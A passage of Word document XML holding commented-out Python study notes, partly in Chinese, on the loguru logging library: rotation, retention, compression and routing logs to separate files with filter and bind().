    <w:p w14:paraId="7AB74637" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.critical('this is critical message!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D96D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78601DC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A624DAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># def add(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484ADAA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         self,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3660C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         sink,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EE6B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         *,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5431D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         level=_defaults.LOGURU_LEVEL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC5A18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         format=_defaults.LOGURU_FORMAT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67092B26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         filter=_defaults.LOGURU_FILTER,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9483D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         colorize=_defaults.LOGURU_COLORIZE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E53A87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         serialize=_defaults.LOGURU_SERIALIZE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76033C3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         backtrace=_defaults.LOGURU_BACKTRACE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AB8EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         diagnose=_defaults.LOGURU_DIAGNOSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304D13D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         enqueue=_defaults.LOGURU_ENQUEUE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBB7BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         catch=_defaults.LOGURU_CATCH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A250923" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#         **kwargs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC39BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#     )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FE014" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30641FA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime.log', format="{time} {level} {message}", filter="my_module", level="INFO")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E3E74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime_{time}.log', rotation="500 MB")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EAF3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A5EC31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime_{time}.log', rotation='00:00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062C148" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>每天</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>点新创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479DCAD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7A575F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime_{time}.log', rotation='1 week')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7687C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>每周</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>新创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>文件输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31434325" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C73AD4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCC01B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime.log', retention='10 days')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969CF6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>日志文件最长保留</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B474045" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67796F54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add('runtime.log', compression='zip')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0E8AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>日志压缩格式是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DACB53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B71BDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.info('If you are using Python {}, prefer {feature} of course!', 3.6, feature='f-strings')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5296E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>有个博客说是《友好的格式化》，但是我感觉并不好用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D033EA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5086358C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C12941" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>如何记录到两个文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585883F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CAB2E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> logger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，再用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> logger.bind() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> logger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的区分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D4505" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8D9E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add("../static/logs/a.log", filter=lambda record: record["extra"]["name"] == "service_log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F8B64E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add("../static/logs/b.log", filter=lambda record: record["extra"]["name"] == "app_log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75767F1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF75EE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>函数就是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>里额外增加键值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76002545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger_a = logger.bind(name="service_log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2BD1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger_b = logger.bind(name="app_log")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D8428" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0703DA29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger_a.info("Message A")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D51263" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger_b.info("Message B")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F4259" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361116C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>根据日志等级记录到不同文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A32D27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="370803BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
